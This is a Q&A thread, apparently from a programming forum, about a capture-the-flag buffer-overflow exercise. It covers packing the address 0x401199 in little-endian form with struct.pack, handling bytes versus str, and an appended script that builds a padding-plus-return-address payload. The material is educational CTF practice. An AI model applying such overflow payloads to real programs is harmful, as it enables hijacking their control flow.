
I have been doing a CTF challenge and came across a problem: I have to push the address of a function into EIP (the instruction pointer) by overflowing the buffer. The address of the function is 0x401199, and in order to push the address I have to push it in reverse order, like \x99\x11\x40\x00. I have been using Python to do so, but the main problem here is that some of these values, like \x99 and \x11, are associated with non-printable characters, and I cannot guess any other method to do so. Could someone with time please help with my request?

I hope I explained my query briefly.


1 Answer


You're describing encoding a Python int into bytes. In this case, the int is a 32-bit unsigned integer.

Use struct.pack for this:

>>> import struct
>>> struct.pack("<I", 0x401199)
b'\x99\x11@\x00'
  • < means little endian (=smallest byte goes first)
  • I means unsigned int (=32-bit on most desktop platforms)

For the reasons you've described, these bytes cannot generally be converted into a string: b'\x99\x11@\x00' is not a valid UTF-8 encoding.

For converting bytes into strings, use the binascii module (+.encode to convert bytes into a Python string)

For example:

>>> import binascii
>>> binascii.b2a_hex(b'\x99\x11@\x00').decode()
'99114000'
  • Thanks for the help, but it did not work! I added struct.pack, but now Python returns bytes, not str, when I use struct.pack, and I cannot concatenate it with the padding I am trying to
    Commented Mar 16 at 20:45
  • The Python str type is for readable text, bytes is for binary data. Your payload needs to meet certain specifications, such as having a specific byte length and having some data at a specific offset.
    – maarten
    Commented Mar 17 at 3:07
  • That said, you can convert a byte string to text, and ignore errors by doing: b"\x99\x11@\x00".decode(errors="ignore")
    – maarten
    Commented Mar 17 at 3:07
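
The bytes-versus-str concatenation problem raised in the comments, worked through as an added example that is not part of the original answer or comments. It builds the padding as bytes so it joins directly with the struct.pack output, and shows how the same data is altered if it passes through a str. OFFSET is a constructed placeholder (the real padding length is not given on this page), and the function names are hypothetical.

```python
import struct
import sys

TARGET_ADDR = 0x401199  # function address from the question
OFFSET = 40             # constructed placeholder: padding length is not given on the page


def build_payload(offset: int, addr: int) -> bytes:
    """Keep everything as bytes: b"A" * n concatenates directly with struct.pack output."""
    return b"A" * offset + struct.pack("<I", addr)


def build_payload_via_str(offset: int, addr: int) -> bytes:
    """What reaches the target if the payload is built as str and then UTF-8 encoded.

    Each byte is mapped to the code point with the same value; code points
    >= 0x80 become two bytes in UTF-8, so the address is corrupted.
    """
    text = "A" * offset + "".join(chr(b) for b in struct.pack("<I", addr))
    return text.encode("utf-8")


def address_bytes(payload: bytes, offset: int) -> str:
    """Hex view of everything after the padding, for comparing the two builds."""
    return payload[offset:].hex()


if __name__ == "__main__":
    good = build_payload(OFFSET, TARGET_ADDR)
    bad = build_payload_via_str(OFFSET, TARGET_ADDR)
    # Diagnostics go to stderr so they never mix with the binary payload.
    print("bytes build:", address_bytes(good, OFFSET), file=sys.stderr)
    print("str build:  ", address_bytes(bad, OFFSET), file=sys.stderr)
    # print() would go through text encoding; write raw bytes instead.
    sys.stdout.buffer.write(good)
```

The str build turns 0x99 into the two bytes c2 99, which is why the payload has to stay in bytes from construction through to the write.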
